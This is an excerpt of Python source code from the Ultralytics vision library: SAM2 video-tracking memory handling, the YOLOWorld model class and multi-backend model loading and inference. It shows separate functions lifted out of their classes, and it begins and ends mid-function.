    for is_cond in (False, True):
        # Separately consolidate conditioning and non-conditioning temp outputs
        storage_key = "cond_frame_outputs" if is_cond else "non_cond_frame_outputs"
        # Find all the frames that contain temporary outputs for any objects
        # (these should be the frames that have just received clicks or mask inputs
        # via `add_new_prompts`)
        temp_frame_inds = set()
        for obj_temp_output_dict in temp_output_dict_per_obj.values():
            temp_frame_inds.update(obj_temp_output_dict[storage_key].keys())
        consolidated_frame_inds[storage_key].update(temp_frame_inds)
        # consolidate the temporary output across all objects on this frame
        for frame_idx in temp_frame_inds:
            consolidated_out = self._consolidate_temp_output_across_obj(
                frame_idx, is_cond=is_cond, run_mem_encoder=True
            )
            # merge them into "output_dict" and also create per-object slices
            output_dict[storage_key][frame_idx] = consolidated_out
            self._add_output_per_object(frame_idx, consolidated_out, storage_key)
            if clear_around_input:
                # clear non-conditioning memory of the surrounding frames
                self._clear_non_cond_mem_around_input(frame_idx)

        # clear temporary outputs in `temp_output_dict_per_obj`
        for obj_temp_output_dict in temp_output_dict_per_obj.values():
            obj_temp_output_dict[storage_key].clear()

    # edge case: if an output is added to "cond_frame_outputs", we remove any prior
    # output on the same frame in "non_cond_frame_outputs"
    for frame_idx in output_dict["cond_frame_outputs"]:
        output_dict["non_cond_frame_outputs"].pop(frame_idx, None)
    for obj_output_dict in state["output_dict_per_obj"].values():
        for frame_idx in obj_output_dict["cond_frame_outputs"]:
            obj_output_dict["non_cond_frame_outputs"].pop(frame_idx, None)
    for frame_idx in consolidated_frame_inds["cond_frame_outputs"]:
        assert frame_idx in output_dict["cond_frame_outputs"]
        consolidated_frame_inds["non_cond_frame_outputs"].discard(frame_idx)

    # Make sure that the frame indices in "consolidated_frame_inds" are exactly those frames
    # with either points or mask inputs (which should be true under a correct workflow).
    all_consolidated_frame_inds = (
        consolidated_frame_inds["cond_frame_outputs"] | consolidated_frame_inds["non_cond_frame_outputs"]
    )
    input_frames_inds = set()
    for point_inputs_per_frame in state["point_inputs_per_obj"].values():
        input_frames_inds.update(point_inputs_per_frame.keys())
    for mask_inputs_per_frame in state["mask_inputs_per_obj"].values():
        input_frames_inds.update(mask_inputs_per_frame.keys())
    assert all_consolidated_frame_inds == input_frames_inds
def get_im_features(self, im, batch=1):
    """
    Run the image encoder and return backbone features, optionally expanded to `batch` entries.

    Args:
        im (torch.Tensor): The input image tensor, passed unchanged to `self.model.forward_image`.
        batch (int, optional): Number of entries to expand the features to (one per prompt/object).
            Defaults to 1, which leaves the encoder output as is.

    Returns:
        vis_feats (torch.Tensor): The visual features extracted from the image.
        vis_pos_embed (torch.Tensor): The positional embeddings for the visual features.
        feat_sizes (List(Tuple[int])): A list containing the sizes of the extracted features.

    Note:
        - When `batch` is greater than 1, the `"backbone_fpn"` and `"vision_pos_enc"` lists of the
          encoder output are overwritten in place with tensors expanded along the first dimension.
        - The three returned values are the last three items produced by the model's
          `_prepare_backbone_features` method.
    """
    backbone_out = self.model.forward_image(im)

    if batch > 1:  # expand features if there's more than one prompt
        for key in ("backbone_fpn", "vision_pos_enc"):
            levels = backbone_out[key]
            # Slice assignment keeps the same list object, matching an element-by-element overwrite.
            levels[:] = [level.expand(batch, -1, -1, -1) for level in levels]

    prepared = self.model._prepare_backbone_features(backbone_out)
    _, vis_feats, vis_pos_embed, feat_sizes = prepared
    return vis_feats, vis_pos_embed, feat_sizes
+ """ + obj_idx = self.inference_state["obj_id_to_idx"].get(obj_id, None) + if obj_idx is not None: + return obj_idx + + # This is a new object id not sent to the server before. We only allow adding + # new objects *before* the tracking starts. + allow_new_object = not self.inference_state["tracking_has_started"] + if allow_new_object: + # get the next object slot + obj_idx = len(self.inference_state["obj_id_to_idx"]) + self.inference_state["obj_id_to_idx"][obj_id] = obj_idx + self.inference_state["obj_idx_to_id"][obj_idx] = obj_id + self.inference_state["obj_ids"] = list(self.inference_state["obj_id_to_idx"]) + # set up input and output structures for this object + self.inference_state["point_inputs_per_obj"][obj_idx] = {} + self.inference_state["mask_inputs_per_obj"][obj_idx] = {} + self.inference_state["output_dict_per_obj"][obj_idx] = { + "cond_frame_outputs": {}, # dict containing {frame_idx: } + "non_cond_frame_outputs": {}, # dict containing {frame_idx: } + } + self.inference_state["temp_output_dict_per_obj"][obj_idx] = { + "cond_frame_outputs": {}, # dict containing {frame_idx: } + "non_cond_frame_outputs": {}, # dict containing {frame_idx: } + } + return obj_idx + else: + raise RuntimeError( + f"Cannot add new object id {obj_id} after tracking starts. " + f"All existing object ids: {self.inference_state['obj_ids']}. " + f"Please call 'reset_state' to restart from scratch." + ) + + def _run_single_frame_inference( + self, + output_dict, + frame_idx, + batch_size, + is_init_cond_frame, + point_inputs, + mask_inputs, + reverse, + run_mem_encoder, + prev_sam_mask_logits=None, + ): + """ + Run tracking on a single frame based on current inputs and previous memory. + + Args: + output_dict (Dict): The dictionary containing the output states of the tracking process. + frame_idx (int): The index of the current frame. + batch_size (int): The batch size for processing the frame. 
+ is_init_cond_frame (bool): Indicates if the current frame is an initial conditioning frame. + point_inputs (Dict, Optional): Input points and their labels. Defaults to None. + mask_inputs (torch.Tensor, Optional): Input binary masks. Defaults to None. + reverse (bool): Indicates if the tracking should be performed in reverse order. + run_mem_encoder (bool): Indicates if the memory encoder should be executed. + prev_sam_mask_logits (torch.Tensor, Optional): Previous mask logits for the current object. Defaults to None. + + Returns: + current_out (dict): A dictionary containing the output of the tracking step, including updated features and predictions. + + Raises: + AssertionError: If both `point_inputs` and `mask_inputs` are provided, or neither is provided. + + Note: + - The method assumes that `point_inputs` and `mask_inputs` are mutually exclusive. + - The method retrieves image features using the `get_im_features` method. + - The `maskmem_pos_enc` is assumed to be constant across frames, hence only one copy is stored. + - The `fill_holes_in_mask_scores` function is commented out and currently unsupported due to CUDA extension requirements. 
def _get_maskmem_pos_enc(self, out_maskmem_pos_enc):
    """
    Caches and manages the positional encoding for mask memory across frames and objects.

    The positional encoding (`maskmem_pos_enc`) is treated as constant across frames and objects, so a
    single-object slice of the first encoding seen is cloned into `self.inference_state["constants"]`.
    Every call then returns views of that cached copy expanded to the batch size of the incoming
    encoding, so that the per-frame outputs never keep their own copy alive (this includes the
    single-object case, where the batch size is 1).

    Args:
        out_maskmem_pos_enc (List[torch.Tensor] or None): The positional encoding for mask memory.
            Should be a list of tensors or None.

    Returns:
        out_maskmem_pos_enc (List[torch.Tensor] | None): Views of the cached positional encoding expanded
            to the current batch size, or None if the input was None.

    Raises:
        AssertionError: If the encoding has not been cached yet and the input is not a list.

    Note:
        - Only a single object's slice (`x[0:1]`) is cached since the encoding is the same across objects.
        - The returned tensors share memory with the cache and must not be modified in place.
        - Tensors are expanded with four dimensions, i.e. they are assumed to be 4-D.
    """
    model_constants = self.inference_state["constants"]
    # "out_maskmem_pos_enc" should be either a list of tensors or None
    if out_maskmem_pos_enc is None:
        return None

    if "maskmem_pos_enc" not in model_constants:
        assert isinstance(out_maskmem_pos_enc, list)
        # only take the slice for one object, since it's same across objects
        model_constants["maskmem_pos_enc"] = [x[0:1].clone() for x in out_maskmem_pos_enc]
    maskmem_pos_enc = model_constants["maskmem_pos_enc"]

    # Expand the cached maskmem_pos_enc to the actual batch size. This is done for a batch size of 1
    # as well, so the caller stores a view of the cache rather than a fresh per-frame tensor.
    batch_size = out_maskmem_pos_enc[0].size(0)
    return [x.expand(batch_size, -1, -1, -1) for x in maskmem_pos_enc]
It fills in any missing objects either from the main output dictionary or leaves + placeholders if they do not exist in the main output. Optionally, it can re-run the memory + encoder after applying non-overlapping constraints to the object scores. + + Args: + frame_idx (int): The index of the frame for which to consolidate outputs. + is_cond (bool, Optional): Indicates if the frame is considered a conditioning frame. + Defaults to False. + run_mem_encoder (bool, Optional): Specifies whether to run the memory encoder after + consolidating the outputs. Defaults to False. + + Returns: + consolidated_out (dict): A consolidated output dictionary containing the combined results for all objects. + + Note: + - The method initializes the consolidated output with placeholder values for missing objects. + - It searches for outputs in both the temporary and main output dictionaries. + - If `run_mem_encoder` is True, it applies non-overlapping constraints and re-runs the memory encoder. + - The `maskmem_features` and `maskmem_pos_enc` are only populated when `run_mem_encoder` is True. + """ + batch_size = len(self.inference_state["obj_idx_to_id"]) + storage_key = "cond_frame_outputs" if is_cond else "non_cond_frame_outputs" + + # Initialize `consolidated_out`. Its "maskmem_features" and "maskmem_pos_enc" + # will be added when rerunning the memory encoder after applying non-overlapping + # constraints to object scores. Its "pred_masks" are prefilled with a large + # negative value (NO_OBJ_SCORE) to represent missing objects. 
+ consolidated_out = { + "maskmem_features": None, + "maskmem_pos_enc": None, + "pred_masks": torch.full( + size=(batch_size, 1, self.imgsz[0] // 4, self.imgsz[1] // 4), + fill_value=-1024.0, + dtype=torch.float32, + device=self.device, + ), + "obj_ptr": torch.full( + size=(batch_size, self.model.hidden_dim), + fill_value=-1024.0, + dtype=torch.float32, + device=self.device, + ), + "object_score_logits": torch.full( + size=(batch_size, 1), + # default to 10.0 for object_score_logits, i.e. assuming the object is + # present as sigmoid(10)=1, same as in `predict_masks` of `MaskDecoder` + fill_value=10.0, + dtype=torch.float32, + device=self.device, + ), + } + for obj_idx in range(batch_size): + obj_temp_output_dict = self.inference_state["temp_output_dict_per_obj"][obj_idx] + obj_output_dict = self.inference_state["output_dict_per_obj"][obj_idx] + out = ( + obj_temp_output_dict[storage_key].get(frame_idx) + # If the object doesn't appear in "temp_output_dict_per_obj" on this frame, + # we fall back and look up its previous output in "output_dict_per_obj". + # We look up both "cond_frame_outputs" and "non_cond_frame_outputs" in + # "output_dict_per_obj" to find a previous output for this object. + or obj_output_dict["cond_frame_outputs"].get(frame_idx) + or obj_output_dict["non_cond_frame_outputs"].get(frame_idx) + ) + # If the object doesn't appear in "output_dict_per_obj" either, we skip it + # and leave its mask scores to the default scores (i.e. the NO_OBJ_SCORE + # placeholder above) and set its object pointer to be a dummy pointer. + if out is None: + # Fill in dummy object pointers for those objects without any inputs or + # tracking outcomes on this frame (only do it under `run_mem_encoder=True`, + # i.e. when we need to build the memory for tracking). 
+ if run_mem_encoder: + # fill object pointer with a dummy pointer (based on an empty mask) + consolidated_out["obj_ptr"][obj_idx : obj_idx + 1] = self._get_empty_mask_ptr(frame_idx) + continue + # Add the temporary object output mask to consolidated output mask + consolidated_out["pred_masks"][obj_idx : obj_idx + 1] = out["pred_masks"] + consolidated_out["obj_ptr"][obj_idx : obj_idx + 1] = out["obj_ptr"] + + # Optionally, apply non-overlapping constraints on the consolidated scores and rerun the memory encoder + if run_mem_encoder: + high_res_masks = F.interpolate( + consolidated_out["pred_masks"], + size=self.imgsz, + mode="bilinear", + align_corners=False, + ) + if self.model.non_overlap_masks_for_mem_enc: + high_res_masks = self.model._apply_non_overlapping_constraints(high_res_masks) + consolidated_out["maskmem_features"], consolidated_out["maskmem_pos_enc"] = self._run_memory_encoder( + batch_size=batch_size, + high_res_masks=high_res_masks, + is_mask_from_pts=True, # these frames are what the user interacted with + object_score_logits=consolidated_out["object_score_logits"], + ) + + return consolidated_out + + def _get_empty_mask_ptr(self, frame_idx): + """ + Get a dummy object pointer based on an empty mask on the current frame. + + Args: + frame_idx (int): The index of the current frame for which to generate the dummy object pointer. + + Returns: + (torch.Tensor): A tensor representing the dummy object pointer generated from the empty mask. 
def _run_memory_encoder(self, batch_size, high_res_masks, object_score_logits, is_mask_from_pts):
    """
    Encode the given high-resolution masks into memory features for the current image.

    Typically called after the non-overlapping constraint changed the object scores, so the memory has to be
    recomputed from the updated masks.

    Args:
        batch_size (int): Batch size passed on when fetching the image features.
        high_res_masks (torch.Tensor): High-resolution masks to encode.
        object_score_logits (torch.Tensor): Object score logits forwarded to the memory encoder.
        is_mask_from_pts (bool): Whether the masks originate from point interactions.

    Returns:
        (tuple): The encoded memory features cast to float16 on `self.device`, and the positional encoding as
            returned by `self._get_maskmem_pos_enc`.
    """
    # Fetch the features of the image held in the inference state; positional embeddings are not needed here
    image = self.inference_state["im"]
    vision_feats, _, sizes = self.get_im_features(image, batch_size)

    encoded = self.model._encode_new_memory(
        current_vision_feats=vision_feats,
        feat_sizes=sizes,
        pred_masks_high_res=high_res_masks,
        is_mask_from_pts=is_mask_from_pts,
        object_score_logits=object_score_logits,
    )
    features, pos_enc = encoded

    # The positional encoding is identical across frames, so it goes through the shared cache helper
    pos_enc = self._get_maskmem_pos_enc(pos_enc)
    features = features.to(dtype=torch.float16, device=self.device, non_blocking=True)
    return features, pos_enc
def _clear_non_cond_mem_around_input(self, frame_idx):
    """
    Drop the non-conditioning memory of the frames surrounding an interacted frame.

    After a correction click, nearby frames may still hold non-conditioning memory with outdated object
    appearance. Those entries are removed from both the shared output dictionary and every per-object output
    dictionary so the model does not see old and new information at the same time.

    Args:
        frame_idx (int): Index of the frame on which the user interaction happened.
    """
    # Half-width of the window: temporal stride times the number of mask memories
    radius = self.model.memory_temporal_stride_for_eval * self.model.num_maskmem
    first, last = frame_idx - radius, frame_idx + radius

    for t in range(first, last + 1):
        state = self.inference_state
        state["output_dict"]["non_cond_frame_outputs"].pop(t, None)
        for per_obj_outputs in state["output_dict_per_obj"].values():
            per_obj_outputs["non_cond_frame_outputs"].pop(t, None)
class YOLOWorld(Model):
    """YOLO-World object detection model."""

    def __init__(self, model="yolov8s-world.pt", verbose=False) -> None:
        """
        Initialize YOLOv8-World model with a pre-trained model file.

        Loads a YOLOv8-World model for object detection. If the loaded model has no `names` attribute, the class
        names from the bundled `coco8.yaml` dataset config are assigned.

        Args:
            model (str | Path): Path to the pre-trained model file. Supports *.pt and *.yaml formats.
            verbose (bool): If True, prints additional information during initialization.
        """
        super().__init__(model=model, task="detect", verbose=verbose)

        # Assign default COCO class names when there are no custom names
        if not hasattr(self.model, "names"):
            self.model.names = yaml_load(ROOT / "cfg/datasets/coco8.yaml").get("names")

    @property
    def task_map(self):
        """Map head to model, validator, predictor, and trainer classes."""
        return {
            "detect": {
                "model": WorldModel,
                "validator": yolo.detect.DetectionValidator,
                "predictor": yolo.detect.DetectionPredictor,
                "trainer": yolo.world.WorldTrainer,
            }
        }

    def set_classes(self, classes):
        """
        Set the classes the model should detect.

        The full `classes` sequence (including an optional background entry) is passed to the underlying model,
        while the stored class names omit the first background entry `" "`. The caller's sequence is not modified.

        Args:
            classes (List[str]): A list of categories i.e. ["person"].
        """
        self.model.set_classes(classes)

        # Build the visible names on a copy: removing the background entry in place would silently mutate the
        # caller's list (and fail outright for tuples).
        names = list(classes)
        background = " "
        if background in names:
            names.remove(background)
        self.model.names = names

        # Update the existing predictor in place (rather than resetting it) so it does not keep the old names
        if self.predictor:
            self.predictor.model.names = names
def default_class_names(data=None):
    """
    Return class names read from a dataset YAML, or numeric placeholder names.

    Args:
        data (str | Path, optional): Dataset YAML to read the "names" entry from. Falsy values skip the lookup.

    Returns:
        (dict | list): The "names" entry of the YAML when it can be loaded, otherwise a dict mapping
            0..998 to "class0".."class998".
    """
    if data:
        try:
            names = yaml_load(check_yaml(data))["names"]
        except Exception:
            # Deliberate best-effort: any failure to resolve or parse the YAML falls through to the defaults
            pass
        else:
            return names
    return {i: f"class{i}" for i in range(999)}  # return default if above errors
+ dnn (bool): Use OpenCV DNN module for ONNX inference. Defaults to False. + data (str | Path | optional): Path to the additional data.yaml file containing class names. Optional. + fp16 (bool): Enable half-precision inference. Supported only on specific backends. Defaults to False. + batch (int): Batch-size to assume for inference. + fuse (bool): Fuse Conv2D + BatchNorm layers for optimization. Defaults to True. + verbose (bool): Enable verbose logging. Defaults to True. + """ + super().__init__() + w = str(weights[0] if isinstance(weights, list) else weights) + nn_module = isinstance(weights, torch.nn.Module) + ( + pt, + jit, + onnx, + xml, + engine, + coreml, + saved_model, + pb, + tflite, + edgetpu, + tfjs, + paddle, + mnn, + ncnn, + imx, + triton, + ) = self._model_type(w) + fp16 &= pt or jit or onnx or xml or engine or nn_module or triton # FP16 + nhwc = coreml or saved_model or pb or tflite or edgetpu # BHWC formats (vs torch BCWH) + stride = 32 # default stride + model, metadata, task = None, None, None + + # Set device + cuda = torch.cuda.is_available() and device.type != "cpu" # use CUDA + if cuda and not any([nn_module, pt, jit, engine, onnx]): # GPU dataloader formats + device = torch.device("cpu") + cuda = False + + # Download if not local + if not (pt or triton or nn_module): + w = attempt_download_asset(w) + + # In-memory PyTorch model + if nn_module: + model = weights.to(device) + if fuse: + model = model.fuse(verbose=verbose) + if hasattr(model, "kpt_shape"): + kpt_shape = model.kpt_shape # pose-only + stride = max(int(model.stride.max()), 32) # model stride + names = model.module.names if hasattr(model, "module") else model.names # get class names + model.half() if fp16 else model.float() + self.model = model # explicitly assign for to(), cpu(), cuda(), half() + pt = True + + # PyTorch + elif pt: + from ultralytics.nn.tasks import attempt_load_weights + + model = attempt_load_weights( + weights if isinstance(weights, list) else w, device=device, 
inplace=True, fuse=fuse + ) + if hasattr(model, "kpt_shape"): + kpt_shape = model.kpt_shape # pose-only + stride = max(int(model.stride.max()), 32) # model stride + names = model.module.names if hasattr(model, "module") else model.names # get class names + model.half() if fp16 else model.float() + self.model = model # explicitly assign for to(), cpu(), cuda(), half() + + # TorchScript + elif jit: + LOGGER.info(f"Loading {w} for TorchScript inference...") + extra_files = {"config.txt": ""} # model metadata + model = torch.jit.load(w, _extra_files=extra_files, map_location=device) + model.half() if fp16 else model.float() + if extra_files["config.txt"]: # load metadata dict + metadata = json.loads(extra_files["config.txt"], object_hook=lambda x: dict(x.items())) + + # ONNX OpenCV DNN + elif dnn: + LOGGER.info(f"Loading {w} for ONNX OpenCV DNN inference...") + check_requirements("opencv-python>=4.5.4") + net = cv2.dnn.readNetFromONNX(w) + + # ONNX Runtime and IMX + elif onnx or imx: + LOGGER.info(f"Loading {w} for ONNX Runtime inference...") + check_requirements(("onnx", "onnxruntime-gpu" if cuda else "onnxruntime")) + if IS_RASPBERRYPI or IS_JETSON: + # Fix 'numpy.linalg._umath_linalg' has no attribute '_ilp64' for TF SavedModel on RPi and Jetson + check_requirements("numpy==1.23.5") + import onnxruntime + + providers = onnxruntime.get_available_providers() + if not cuda and "CUDAExecutionProvider" in providers: + providers.remove("CUDAExecutionProvider") + elif cuda and "CUDAExecutionProvider" not in providers: + LOGGER.warning("WARNING ⚠️ Failed to start ONNX Runtime session with CUDA. 
Falling back to CPU...") + device = torch.device("cpu") + cuda = False + LOGGER.info(f"Preferring ONNX Runtime {providers[0]}") + if onnx: + session = onnxruntime.InferenceSession(w, providers=providers) + else: + check_requirements( + ["model-compression-toolkit==2.1.1", "sony-custom-layers[torch]==0.2.0", "onnxruntime-extensions"] + ) + w = next(Path(w).glob("*.onnx")) + LOGGER.info(f"Loading {w} for ONNX IMX inference...") + import mct_quantizers as mctq + from sony_custom_layers.pytorch.object_detection import nms_ort # noqa + + session = onnxruntime.InferenceSession( + w, mctq.get_ort_session_options(), providers=["CPUExecutionProvider"] + ) + task = "detect" + + output_names = [x.name for x in session.get_outputs()] + metadata = session.get_modelmeta().custom_metadata_map + dynamic = isinstance(session.get_outputs()[0].shape[0], str) + if not dynamic: + io = session.io_binding() + bindings = [] + for output in session.get_outputs(): + y_tensor = torch.empty(output.shape, dtype=torch.float16 if fp16 else torch.float32).to(device) + io.bind_output( + name=output.name, + device_type=device.type, + device_id=device.index if cuda else 0, + element_type=np.float16 if fp16 else np.float32, + shape=tuple(y_tensor.shape), + buffer_ptr=y_tensor.data_ptr(), + ) + bindings.append(y_tensor) + + # OpenVINO + elif xml: + LOGGER.info(f"Loading {w} for OpenVINO inference...") + check_requirements("openvino>=2024.0.0") + import openvino as ov + + core = ov.Core() + w = Path(w) + if not w.is_file(): # if not *.xml + w = next(w.glob("*.xml")) # get *.xml file from *_openvino_model dir + ov_model = core.read_model(model=str(w), weights=w.with_suffix(".bin")) + if ov_model.get_parameters()[0].get_layout().empty: + ov_model.get_parameters()[0].set_layout(ov.Layout("NCHW")) + + # OpenVINO inference modes are 'LATENCY', 'THROUGHPUT' (not recommended), or 'CUMULATIVE_THROUGHPUT' + inference_mode = "CUMULATIVE_THROUGHPUT" if batch > 1 else "LATENCY" + LOGGER.info(f"Using OpenVINO 
{inference_mode} mode for batch={batch} inference...") + ov_compiled_model = core.compile_model( + ov_model, + device_name="AUTO", # AUTO selects best available device, do not modify + config={"PERFORMANCE_HINT": inference_mode}, + ) + input_name = ov_compiled_model.input().get_any_name() + metadata = w.parent / "metadata.yaml" + + # TensorRT + elif engine: + LOGGER.info(f"Loading {w} for TensorRT inference...") + try: + import tensorrt as trt # noqa https://developer.nvidia.com/nvidia-tensorrt-download + except ImportError: + if LINUX: + check_requirements("tensorrt>7.0.0,!=10.1.0") + import tensorrt as trt # noqa + check_version(trt.__version__, ">=7.0.0", hard=True) + check_version(trt.__version__, "!=10.1.0", msg="https://github.com/ultralytics/ultralytics/pull/14239") + if device.type == "cpu": + device = torch.device("cuda:0") + Binding = namedtuple("Binding", ("name", "dtype", "shape", "data", "ptr")) + logger = trt.Logger(trt.Logger.INFO) + # Read file + with open(w, "rb") as f, trt.Runtime(logger) as runtime: + try: + meta_len = int.from_bytes(f.read(4), byteorder="little") # read metadata length + metadata = json.loads(f.read(meta_len).decode("utf-8")) # read metadata + except UnicodeDecodeError: + f.seek(0) # engine file may lack embedded Ultralytics metadata + model = runtime.deserialize_cuda_engine(f.read()) # read engine + + # Model context + try: + context = model.create_execution_context() + except Exception as e: # model is None + LOGGER.error(f"ERROR: TensorRT model exported with a different version than {trt.__version__}\n") + raise e + + bindings = OrderedDict() + output_names = [] + fp16 = False # default updated below + dynamic = False + is_trt10 = not hasattr(model, "num_bindings") + num = range(model.num_io_tensors) if is_trt10 else range(model.num_bindings) + for i in num: + if is_trt10: + name = model.get_tensor_name(i) + dtype = trt.nptype(model.get_tensor_dtype(name)) + is_input = model.get_tensor_mode(name) == trt.TensorIOMode.INPUT + 
if is_input: + if -1 in tuple(model.get_tensor_shape(name)): + dynamic = True + context.set_input_shape(name, tuple(model.get_tensor_profile_shape(name, 0)[1])) + if dtype == np.float16: + fp16 = True + else: + output_names.append(name) + shape = tuple(context.get_tensor_shape(name)) + else: # TensorRT < 10.0 + name = model.get_binding_name(i) + dtype = trt.nptype(model.get_binding_dtype(i)) + is_input = model.binding_is_input(i) + if model.binding_is_input(i): + if -1 in tuple(model.get_binding_shape(i)): # dynamic + dynamic = True + context.set_binding_shape(i, tuple(model.get_profile_shape(0, i)[1])) + if dtype == np.float16: + fp16 = True + else: + output_names.append(name) + shape = tuple(context.get_binding_shape(i)) + im = torch.from_numpy(np.empty(shape, dtype=dtype)).to(device) + bindings[name] = Binding(name, dtype, shape, im, int(im.data_ptr())) + binding_addrs = OrderedDict((n, d.ptr) for n, d in bindings.items()) + batch_size = bindings["images"].shape[0] # if dynamic, this is instead max batch size + + # CoreML + elif coreml: + LOGGER.info(f"Loading {w} for CoreML inference...") + import coremltools as ct + + model = ct.models.MLModel(w) + metadata = dict(model.user_defined_metadata) + + # TF SavedModel + elif saved_model: + LOGGER.info(f"Loading {w} for TensorFlow SavedModel inference...") + import tensorflow as tf + + keras = False # assume TF1 saved_model + model = tf.keras.models.load_model(w) if keras else tf.saved_model.load(w) + metadata = Path(w) / "metadata.yaml" + + # TF GraphDef + elif pb: # https://www.tensorflow.org/guide/migrate#a_graphpb_or_graphpbtxt + LOGGER.info(f"Loading {w} for TensorFlow GraphDef inference...") + import tensorflow as tf + + from ultralytics.engine.exporter import gd_outputs + + def wrap_frozen_graph(gd, inputs, outputs): + """Wrap frozen graphs for deployment.""" + x = tf.compat.v1.wrap_function(lambda: tf.compat.v1.import_graph_def(gd, name=""), []) # wrapped + ge = x.graph.as_graph_element + return 
x.prune(tf.nest.map_structure(ge, inputs), tf.nest.map_structure(ge, outputs)) + + gd = tf.Graph().as_graph_def() # TF GraphDef + with open(w, "rb") as f: + gd.ParseFromString(f.read()) + frozen_func = wrap_frozen_graph(gd, inputs="x:0", outputs=gd_outputs(gd)) + try: # find metadata in SavedModel alongside GraphDef + metadata = next(Path(w).resolve().parent.rglob(f"{Path(w).stem}_saved_model*/metadata.yaml")) + except StopIteration: + pass + + # TFLite or TFLite Edge TPU + elif tflite or edgetpu: # https://www.tensorflow.org/lite/guide/python#install_tensorflow_lite_for_python + try: # https://coral.ai/docs/edgetpu/tflite-python/#update-existing-tf-lite-code-for-the-edge-tpu + from tflite_runtime.interpreter import Interpreter, load_delegate + except ImportError: + import tensorflow as tf + + Interpreter, load_delegate = tf.lite.Interpreter, tf.lite.experimental.load_delegate + if edgetpu: # TF Edge TPU https://coral.ai/software/#edgetpu-runtime + device = device[3:] if str(device).startswith("tpu") else ":0" + LOGGER.info(f"Loading {w} on device {device[1:]} for TensorFlow Lite Edge TPU inference...") + delegate = {"Linux": "libedgetpu.so.1", "Darwin": "libedgetpu.1.dylib", "Windows": "edgetpu.dll"}[ + platform.system() + ] + interpreter = Interpreter( + model_path=w, + experimental_delegates=[load_delegate(delegate, options={"device": device})], + ) + device = "cpu" # Required, otherwise PyTorch will try to use the wrong device + else: # TFLite + LOGGER.info(f"Loading {w} for TensorFlow Lite inference...") + interpreter = Interpreter(model_path=w) # load TFLite model + interpreter.allocate_tensors() # allocate + input_details = interpreter.get_input_details() # inputs + output_details = interpreter.get_output_details() # outputs + # Load metadata + try: + with zipfile.ZipFile(w, "r") as model: + meta_file = model.namelist()[0] + metadata = ast.literal_eval(model.read(meta_file).decode("utf-8")) + except zipfile.BadZipFile: + pass + + # TF.js + elif tfjs: + raise 
NotImplementedError("YOLOv8 TF.js inference is not currently supported.") + + # PaddlePaddle + elif paddle: + LOGGER.info(f"Loading {w} for PaddlePaddle inference...") + check_requirements("paddlepaddle-gpu" if cuda else "paddlepaddle") + import paddle.inference as pdi # noqa + + w = Path(w) + if not w.is_file(): # if not *.pdmodel + w = next(w.rglob("*.pdmodel")) # get *.pdmodel file from *_paddle_model dir + config = pdi.Config(str(w), str(w.with_suffix(".pdiparams"))) + if cuda: + config.enable_use_gpu(memory_pool_init_size_mb=2048, device_id=0) + predictor = pdi.create_predictor(config) + input_handle = predictor.get_input_handle(predictor.get_input_names()[0]) + output_names = predictor.get_output_names() + metadata = w.parents[1] / "metadata.yaml" + + # MNN + elif mnn: + LOGGER.info(f"Loading {w} for MNN inference...") + check_requirements("MNN") # requires MNN + import os + + import MNN + + config = {} + config["precision"] = "low" + config["backend"] = "CPU" + config["numThread"] = (os.cpu_count() + 1) // 2 + rt = MNN.nn.create_runtime_manager((config,)) + net = MNN.nn.load_module_from_file(w, [], [], runtime_manager=rt, rearrange=True) + + def torch_to_mnn(x): + return MNN.expr.const(x.data_ptr(), x.shape) + + metadata = json.loads(net.get_info()["bizCode"]) + + # NCNN + elif ncnn: + LOGGER.info(f"Loading {w} for NCNN inference...") + check_requirements("git+https://github.com/Tencent/ncnn.git" if ARM64 else "ncnn") # requires NCNN + import ncnn as pyncnn + + net = pyncnn.Net() + net.opt.use_vulkan_compute = cuda + w = Path(w) + if not w.is_file(): # if not *.param + w = next(w.glob("*.param")) # get *.param file from *_ncnn_model dir + net.load_param(str(w)) + net.load_model(str(w.with_suffix(".bin"))) + metadata = w.parent / "metadata.yaml" + + # NVIDIA Triton Inference Server + elif triton: + check_requirements("tritonclient[all]") + from ultralytics.utils.triton import TritonRemoteModel + + model = TritonRemoteModel(w) + metadata = model.metadata + + # 
def forward(self, im, augment=False, visualize=False, embed=None):
    """
    Runs inference on the YOLOv8 MultiBackend model.

    The input is dispatched to exactly one backend, selected by the boolean backend flags stored on the instance
    (pt, jit, dnn, onnx/imx, xml, engine, coreml, paddle, mnn, ncnn, triton, otherwise TensorFlow).

    Args:
        im (torch.Tensor): The image tensor to perform inference on, unpacked as (batch, channel, height, width).
        augment (bool): whether to perform data augmentation during inference, defaults to False. Only forwarded
            to the PyTorch / nn.Module backend.
        visualize (bool): whether to visualize the output predictions, defaults to False. Only forwarded to the
            PyTorch / nn.Module backend.
        embed (list, optional): A list of feature vectors/embeddings to return. Only forwarded to the PyTorch /
            nn.Module backend.

    Returns:
        (torch.Tensor | List[torch.Tensor]): When the backend yields a list/tuple, a single converted output if it
            has one element, otherwise a list of converted outputs; any other backend result is converted and
            returned directly.

    Raises:
        TypeError: If a CoreML model returns a 'confidence' output, i.e. it was exported with an NMS pipeline.
        AssertionError: If the TensorRT input shape does not match the 'images' binding shape.
    """
    b, ch, h, w = im.shape  # batch, channel, height, width
    if self.fp16 and im.dtype != torch.float16:
        im = im.half()  # to FP16
    if self.nhwc:
        im = im.permute(0, 2, 3, 1)  # torch BCHW to numpy BHWC shape(1,320,192,3)

    # PyTorch
    if self.pt or self.nn_module:
        y = self.model(im, augment=augment, visualize=visualize, embed=embed)

    # TorchScript
    elif self.jit:
        y = self.model(im)

    # ONNX OpenCV DNN
    elif self.dnn:
        im = im.cpu().numpy()  # torch to numpy
        self.net.setInput(im)
        y = self.net.forward()

    # ONNX Runtime
    elif self.onnx or self.imx:
        if self.dynamic:
            im = im.cpu().numpy()  # torch to numpy
            y = self.session.run(self.output_names, {self.session.get_inputs()[0].name: im})
        else:
            if not self.cuda:
                im = im.cpu()
            # Bind the tensor memory directly instead of copying it through numpy
            self.io.bind_input(
                name="images",
                device_type=im.device.type,
                device_id=im.device.index if im.device.type == "cuda" else 0,
                element_type=np.float16 if self.fp16 else np.float32,
                shape=tuple(im.shape),
                buffer_ptr=im.data_ptr(),
            )
            self.session.run_with_iobinding(self.io)
            y = self.bindings
        if self.imx:
            # boxes, conf, cls
            y = np.concatenate([y[0], y[1][:, :, None], y[2][:, :, None]], axis=-1)

    # OpenVINO
    elif self.xml:
        im = im.cpu().numpy()  # FP32

        if self.inference_mode in {"THROUGHPUT", "CUMULATIVE_THROUGHPUT"}:  # optimized for larger batch-sizes
            n = im.shape[0]  # number of images in batch
            results = [None] * n  # preallocate list with None to match the number of images

